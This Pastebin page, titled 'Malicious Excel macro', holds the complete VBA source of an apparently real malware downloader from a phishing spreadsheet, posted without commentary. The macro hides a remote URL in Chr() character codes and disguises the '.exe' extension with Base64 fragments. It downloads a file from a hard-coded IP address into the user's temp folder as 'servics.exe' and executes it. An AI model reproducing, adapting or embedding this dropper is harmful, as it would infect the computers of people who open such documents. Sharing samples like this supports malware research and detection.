SHARE
TWEET

Malicious Excel macro

dynamoo Dec 23rd, 2014 272 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. Sub parent()
  2. Dim WshShell
  3. Set WshShell = CreateObject("WScript.Shell")
  4. PathToSave = "%TEMP%"
  5. PathToSave = WshShell.ExpandEnvironmentStrings(PathToSave)
  6. Set s = CreateObject("ADODB.Stream")
  7.     strFileURL = Chr(104) & Chr(116) & Chr(116) & Chr(112) & Chr(58) & Chr(47) & Chr(47) & Chr(57) & Chr(53) & Chr(46) & Chr(49) & Chr(54) & Chr(51) & Chr(46) & Chr(49) & Chr(50) & Chr(49) & Chr(46) & Chr(50) & Chr(55) & Chr(58) & Chr(56) & Chr(48) & Chr(56) & Chr(48) & Chr(47) & Chr(115) & Chr(115) & Chr(116) & Chr(97) & Chr(116) & Chr(47) & Chr(108) & Chr(108) & Chr(100) & Chr(118) & Chr(115) & Chr(46) & Chr(112) & Chr(104) & Chr(112)
  8.  
  9.  
  10.     strHDLocation = PathToSave & "servics." & Chr(101) & Chr(120) & Chr(101)
  11.  
  12.  k = janu(strFileURL,strHDLocation)
  13.  Set fso = CreateObject("Scripting.FileSystemObject")
  14.  
  15. If (fso.FileExists(strHDLocation)) Then
  16.   CreateObject("WScript.Shell").run PathToSave & "servics." & Base64Decode("ZQ==") & Base64Decode("eA==") & "e"
  17. End If
  18. Set fso = Nothing
  19. End sub
  20.  
  21.  Function Base64Decode(ByVal base64String)
  22.  
  23.   Const Base64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
  24.   Dim dataLength, sOut, groupBegin
  25.  
  26.  
  27.   base64String = Replace(base64String, vbCrLf, "")
  28.   base64String = Replace(base64String, vbTab, "")
  29.   base64String = Replace(base64String, " ", "")
  30.  
  31.   dataLength = Len(base64String)
  32.   If dataLength Mod 4 <> 0 Then
  33.     Err.Raise 1, "Base64Decode", "Bad Base64 string."
  34.     Exit Function
  35.   End If
  36.  
  37.   For groupBegin = 1 To dataLength Step 4
  38.     Dim numDataBytes, CharCounter, thisChar, thisData, nGroup, pOut
  39.     numDataBytes = 3
  40.     nGroup = 0
  41.  
  42.     For CharCounter = 0 To 3
  43.       thisChar = Mid(base64String, groupBegin + CharCounter, 1)
  44.  
  45.       If thisChar = "=" Then
  46.         numDataBytes = numDataBytes - 1
  47.         thisData = 0
  48.       Else
  49.         thisData = InStr(1, Base64, thisChar, vbBinaryCompare) - 1
  50.       End If
  51.       If thisData = -1 Then
  52.         Err.Raise 2, "Base64Decode", "Bad character In Base64 string."
  53.         Exit Function
  54.       End If
  55.  
  56.       nGroup = 64 * nGroup + thisData
  57.     Next
  58.    
  59.  
  60.     nGroup = Hex(nGroup)
  61.    
  62.     nGroup = String(6 - Len(nGroup), "0") & nGroup
  63.    
  64.     pOut = Chr(CByte("&H" & Mid(nGroup, 1, 2))) + _
  65.       Chr(CByte("&H" & Mid(nGroup, 3, 2))) + _
  66.       Chr(CByte("&H" & Mid(nGroup, 5, 2)))
  67.    
  68.  
  69.     sOut = sOut & Left(pOut, numDataBytes)
  70.   Next
  71.  
  72.   Base64Decode = sOut
  73. End Function
  74.  
  75.    function janu(strFileURL,strHDLocation)
  76.    Set walabapoi = CreateObject("MsXmL2.xMLhTtP")
  77.  
  78.     walabapoi.open "GET", strFileURL, false
  79.     walabapoi.send()
  80.  
  81.     If walabapoi.Status = 200 Then
  82.       Set Newujapi = CreateObject("AdOdB.sTrEam")
  83.       Newujapi.Open
  84.       Newujapi.Type = 1
  85.  
  86.       Newujapi.Write walabapoi.ResponseBody
  87.       Newujapi.Position = 0    
  88.  
  89.       Newujapi.SaveToFile strHDLocation, 2
  90.       Newujapi.Close
  91.       Set Newujapi = Nothing
  92.     End if
  93.  
  94.     Set walabapoi = Nothing
  95.  
  96.  end function
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top